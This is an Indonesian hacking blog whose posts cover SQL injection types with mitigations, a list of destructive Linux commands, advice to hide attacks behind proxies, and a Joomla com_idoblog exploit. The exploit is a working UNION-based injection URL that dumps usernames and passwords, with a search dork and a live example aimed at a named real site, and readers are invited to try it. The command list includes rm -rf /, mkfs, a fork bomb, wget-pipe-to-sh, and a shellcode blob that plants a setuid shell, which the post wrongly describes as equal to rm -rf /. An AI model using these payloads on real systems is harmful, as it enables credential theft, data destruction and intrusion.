CELAH KEAMANAN SQL INJECTION

Jumat, 08 Oktober 2010

JENIS-JENIS CELAH KEAMANAN SQL INJECTION

  1. Karakter-karakter Kontrol Tidak Disaring secara Benar ~ Incorrectly filtered escape characters.
    Bentuk injeksi ini muncul pada saat user memasukkan karakter-karakter string yang tidak difilter dan dapat dilewatkan dalam pernyataan SQL.
    Ilustrasinya :- SQL Umum :
    statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;”

    -Di User Name dan Password :

    Input User : a’ or ‘t’='t Instruksi SQL : SELECT * FROM users WHERE name=’a'OR’t'=’t';

    -Delete Table SQL :

    Input User : a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%’: Instruksi SQL : SELECT * FROM users WHERE name = ‘a’;DROP TABLE users; SELECT * FROMDATAWHERE name LIKE’%';
  2. Bentuk Penanganan yang Tidak Benar ~ Incorrect type handling. Bentuk ini akan muncul pada saat user memasukkan karakter string dengan tipe data yang tidak sama atau tipe data string tersebut tidak periksa batasannya oleh programmer.
    Contoh :
    statement := “SELECT * FROM data WHERE id = ” + a_variable + “;” dan 1;DROP TABLE users maka SELECT * FROMDATAWHERE id = 1;DROP TABLE users;
  3. Celah Keamanan berada didalam Server Basis Datanya ~ Vulnerabilities inside the database server.
    Biasanya celah keamanan bisa terjadi dalam software server database itu sendiri, seperti: MySQL Server didalam salah satu instruksi fungsi SQL berikut :
    mysql_real_escape_string().
    Bagian ini yang biasanya penyerang berhasil menembus dengan memasukkan karakter-karakter string biasa maupun karakter string kosong.
  4. Penyamaran SQL Injection ~ Blind SQL Injection
    Injeksi ini biasanya dilakukan terhadap aplikasi web, yang hasil attack-nya tidak ditampilkan secara langsung namun disamarkan dalam bentuk halaman lain.
    • Respon Logika Kondisi ~ Conditional Responses
      Salah satu teknik untuk mengevaluasi statement logika pada tingkat aplikasi yang sama pada layer.
      Contoh :
      SELECT booktitle FROM booklist WHERE bookId = ‘OOk14cd’AND1=1

      Hasilnya : Berupa halaman web normal.

      SELECT booktitle FROM booklist WHERE bookId = ‘OOk14cd’AND1=2
    • Kesalahan Logika ~ Conditional Errors
      Pemaksaan ini akan mengakibatkan database error untuk mengevaluasi pernyataan yang menyebabkan error apabila pernyataan WHERE adalah true.
      Contoh :
      SELECT 1/0 FROM users WHERE username=’Ralph’
    • Jeda Waktu ~ Time Delays
      Pemaksaan ini mengakibatkan engine database SQL menjalankan proses secara terus-menerus samapai beberapa lama ataupun berdasarkan jeda waktu yang diinjeksikan terhadap query tersebut.

Untuk mengetahui lebih dalam tentang cara kerja SQL Injection dapat anda pelajari disini http://www.unixwiz.net/techtips/sql-injection.html :D

Sebagai administrator ada beberapa cara yang mungkin dapat membantu mengatasi SQL injection ada beberapa cara, antara lain :

  1. Untuk variable berupa angka yang di lewatkan pada URL address(metode get) misal http://www.contoh.org?pid=30 , pid di parsing ke integer terlebih dahulu sebelum masuk ke query. (semua ini berlaku juga untuk metode post)
  2. Atau bisa juga sebelum masuk ke query, variable dengan metode get di lewatkan ke fungsi mysql_escape_string untuk mengubah variable sebagai string yang tidak akan di eksekusi. bentuknya $pid = mysql_escape_string($_GET['pid']).
  3. Database yang di publish di front, baiknya di set read only pada user databasenya, kecuali pada bagian yang membutuhkan write ke database.
  4. Buat fungsi untuk filter kata2 update,delete,insert,grant dll dalam variable yg masuk dalam query.

Dizzy Malicious Script Linux


1. Perintah rm -rf /
Perintah ini akan menghapus seluruh isi folder / (root folder atau root directory). Root folder memang dilindungi oleh hak akses user root, tapi akan sangat berbahaya jika perintah diatas dieksekusi saat kita berada dalam hak akses root. Itulah mengapa sangat dianjurkan untuk menggunakan hak akses user biasa untuk kegiatan sehari-hari.Perintah diatas juga tetap berbahaya jika dijalankan oleh user biasa yang dapat merusak isi folder miliknya sendiri
2. Perintah menggunakan bilangan hexa

char esp[] __attribute__ ((section(�.text�))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;�;

Perintah diatas sama dengan perintah pada nomor 1 hanya saja ditulis dalam bilangan hexa. Jika dieksekusi, sama halnya menghapus seluruh isi folder (rm -rf /). Karena ditulis dalam bilangan hexa, perintah ini bisa juga menjebak user Linux yang berpengalaman
3. Perintah mkfs.ext3 /dev/sda
Perintah ini sama halnya melakukan perintah format pada partisi yang ditunjuk.
4. Perintah forkbomb :(){:|:&};:
Perintah ini akan memerintahkan sistem untuk mengeksekusi berbagai proses sampai hang. Biasanya akan mengakibatkan hilangnya data karena komputer terpaksa harus dimatikan secara paksa.
5. Perintah apapun > /dev
Perintah ini akan menimpa sistem file device yang ditunjuk dan pada akhirnya bisa menyebabkan hilangnya data yang dimounting pada folder /dev (folder /dev biasa digunakan untuk menempatkan keterangan hardware dan harddisk)
6. Perintah untuk eksekusi file shell tertentu
Perintah wget http://alamat-url-yangtidak-jelas -O- | sh akan memerintahkan Linux untuk langsung menjalankan file sh yang ditunjuk. File sh adalah file eksekusi di Linux, sama halnya file .exe. Jangan sekali-kali melakukan perintah diatas untuk file sh yang tidak jelas sumber dan peruntukannya.
7. Perintah memindahkan home folder ke /dev/null
mv /home/home-directory/* /dev/null
Perintah ini akan memindahkan seluruh data di home folder ke file null (file yang sebenarnya tidak ada). File yang dipindahkan akan hilang selamanya tanpa ada backup…

Selain 7 perintah diatas, ada beberapa perintah lainnya yang mungkin belum dimasukkan disini. Prinsip hati-hati dalam menjalankan suatu perintah merupakan hal mutlak yang harus selalu diingat oleh pengguna Linux.

untuk nomor 3 s/d 4 emang berbahaya apabila komputer tidak dipake sendirian atau ada dalam lingkup LAN, sedangkan nomor 1 & 2 masih bisa kita cegah dengan menggunakan perintah CHOWN atau CHATTR, dan menset ke dalam root privalage, jamin aman kecuali rootnya sendiri yg ngejalanin

Attacker selalu pake kondom

Rabu, 26 Agustus 2009

Anak nongkrong ini cuman sekedar postingan sederhana...untuk mengigatkan kalau kita lagi attacker jangan lupa pake kondom alias proxy, kenapa?gak usah di jelasin anak nongkrong pasti juga sudah tahukan kenapa!! ok berikut ini Devilz akan memberi informasi cara setting proxy paling cepat:

1.Gunkakan Mozila firefox

2.Download addon mozila Proxy pada link ini
https://addons.mozilla.org/en-US/firefox/addon/2464

3.Install lalu restart mozila

4.pilih Options pada addon proxy tadi dan masukan proxy

5.untuk proxy bisa lihat pada alamat ini
http://www.proxy4free.com/page1.html

6.setelah proxy di input lakukan test proxy jalan atau tidak
pada alamat berikut ini http://whatismyipaddress.com/

7.Kalo lokasinya bukan indonesia berarti froxy sukses kalo lokasinya masih lokasi kamu berarti gagal, ulangi ke step 1.

Have fun........

Exploid Joomla componen blog

Anak nongkrong beberapa hari yang lalu iseng mampir ke milw0rm, eh nemu exploid Joomla baru, bugs ini masih banyak yang belum tau mumpung masih hangat silahkan di coba :

========Exploid=========================
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws
(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16
+from+jos_users--
=======================================


=======Dork===============
inurl:"com_idoblog"
==========================

=========Contoh joomla exploid=====

http://saveourladyschildrenshospital.com/index.php?
option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws
(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16
+from+jos_users--
===============================

Ok sekian dulu silahkan di lanjutinn nongkrong nya yah....Jangan lupa comment


Devil Nongkrong di blogs'

Jumat, 24 Juli 2009


ini adalah postingan pertama gw ....eheemmmm enaknya ngapainya kalo postingan pertama, oh ini aja mungkin perkenalan dulu kali ya!! kalo kalian belom tau siapa gw kenalan dulu dech

My name is : ada dech mau tau aja lo.......!!!
Nick Name : Devil_Nongkrong
Hoby : Online..onlinee (kaya Lagu) Main internet wat cari ilmu, kalau main games sama facebook bikin bego
Lokasi : Jakarta Kota tua.......ih sereeeeeeeeeem
Ym: Devil_Nongkrong@yahoo.com add gw ya biar bisa cahting2ngan

Selebih nya gw cuman anak bawang yang haus akan ilmu....belajar...belajar..dan belajar
Hack hack hack hack dan hack

Udah segituh dulu dech... untuk perkenlan nya
tar buat postingan selanjutnya nyusul...!!!
yuk kita nongkrong bareng di blog's....!!!